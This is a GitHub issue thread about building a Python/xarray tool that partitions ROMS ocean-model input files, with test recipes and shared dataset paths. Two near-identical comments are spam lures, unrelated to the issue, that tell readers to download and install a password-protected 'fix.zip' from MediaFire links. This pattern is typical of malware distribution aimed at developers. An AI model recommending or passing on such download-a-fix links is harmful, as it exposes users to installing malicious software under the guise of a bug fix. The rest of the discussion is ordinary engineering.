### ISSUE TITLE
Make partitioning tool for input files

### ISSUE THREAD

**Issue by NoraLoose** [CWorthy-ocean/roms-tools#97]
## Issue

ROMS requires partitioned (or tiled) input files. The ROMS-Tools generated files are currently not partitioned but global. One option to get from global ROMS-Tools generated to partitioned files is to use the fortran script `partit.F`. However, it seems that the fortran `partit.F` does not play well with the ROMS-Tools generated files, see #92, #93, #95.

## Plan

It would there be nice to write a python / xarray version of `partit.F` **within ROMS-Tools**, which works seamlessly for both
- [ ] MATLAB-generated input files
- [ ] ROMS-Tools generated input files

Besides partitioning already created NetCDF input files (see above), it would be nice if the python version of `partit.F` could be called (optionally) as part the `.save()` method of the ROMS-Tools objects. I imagine the following:
```
InitialConditions.save(filepath)
```
will save a global initial conditions file per default - as currently done. However
```
InitialConditions.save(filepath=filepath, tiles={"nx": 3, "ny": 3})
```
will save a partitioned initial conditions file.

**Comment by AnaSousa314** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by deverchettychandrashekar** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/6mkbh6xhau31g
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by NoraLoose** [comment]
## Test recipe

To test the new `partit` tool with ROMS-Tools generated, we can follow the following test recipe to recreate @dafyddstephenson's Wales test case https://github.com/CWorthy-ocean/input_datasets_roms_marbl_example/tree/main with ROMS-Tools.

I will start, and maybe @dafyddstephenson can maybe complete:

1. Clone [this repo](https://github.com/CWorthy-ocean/input_datasets_roms_marbl_example/tree/main)
2. Make grid instance from the MATLAB-generated grid file.
```
from roms_tools import Grid
grid = Grid.from_file(path_to_grid_file_in_cloned_repo)
```
3. Make initial conditions file
```
from roms_tools import InitialConditions
from datetime import datetime
ic = InitialConditions(grid=grid, ini_time=datetime(2012, 1, 1), source={"name": "GLORYS", "path": path_to_GLORYS})
ic.save(filepath, tiles={"nx": 3, "ny": 3})
```
Alternatively, instead of the last line:
```
ic.save(filepath)
from roms_tools import partition
partition(filepath, tiles={"nx": 3, "ny": 3})
```

**Comment by dafyddstephenson** [comment]
However I think if the tool is written using `xarray` there's no reason to assume it would have any problems with the various different datasets made by `roms-tools` that are effectively on the same grid - if it can do the grid file, it should be able to do the rest (I think that's a safe assumption to start with). The only exception here is the boundary file, which has a very weird spatial layout relative to the rest of them (though I think still defined using the same dims/coords).

The current `partit` looks for dimensions like `xi_<whatever>`, and `eta_<whatever>` (the horizontals), operates on those, and ignores the rest, copying any data along other dimensions into the partitioned files as they were in the unpartitioned files.

**Comment by NoraLoose** [comment]
Thanks @dafyddstephenson for writing down the steps - super helpful! A few comments:

- I just merged PR #98, which implements Option C from our discussion in #82. So some of the code in https://github.com/CWorthy-ocean/roms-tools/issues/97#issuecomment-2310821722 won't work anymore. Sorry about that! Should I update the code blocks in your comment @dafyddstephenson, or do you want to do it?
- I will make a shared data directory on both derecho and perlmutter with all the necessary raw input files.

> if the tool is written using xarray there's no reason to assume it would have any problems with the various different datasets made by roms-tools that are effectively on the same grid - if it can do the grid file, it should be able to do the rest

- Yes! But we still want to test it. For example, the time variable in the boundary and surface forcing files have the crucial attribute `cycle_length` if they are created from climatology. We want to make sure that these attributes are kept.

**Comment by dafyddstephenson** [comment]
> Sorry about that! Should I update the code blocks in your comment @dafyddstephenson, or do you want to do it?

 if you let me know what to update I can edit the comment?
> Yes! But we still want to test it. 

> I will make a shared data directory on both derecho and perlmutter with all the necessary raw input files.

no doubt, just didn't want to let lack of access to data prevent work starting on this, I think good progress can be made with just that grid file

lmk if I can help out!

**Comment by NoraLoose** [comment]
@dafyddstephenson I just updated your comment with the appropriate changes.

**Comment by NoraLoose** [comment]
Shared datasets are now under the following paths:
* **Derecho**: `/glade/derecho/scratch/noraloose/Datasets`
* **Perlmutter**: `/pscratch/sd/n/nloose/Datasets` (which symbolically links to `/global/cfs/projectdirs/m4746/Datasets`)

Note that there is a subdirectory structure under these paths, e.g., `GLORYS/NA/2012/`, `ERA5/NA/2012/` etc.

**Comment by TomNicholas** [comment]
I think this domain decomposition logic gets us most of the way there

https://gist.github.com/TomNicholas/6bb0e46d7d5923222adecad217c05bc6
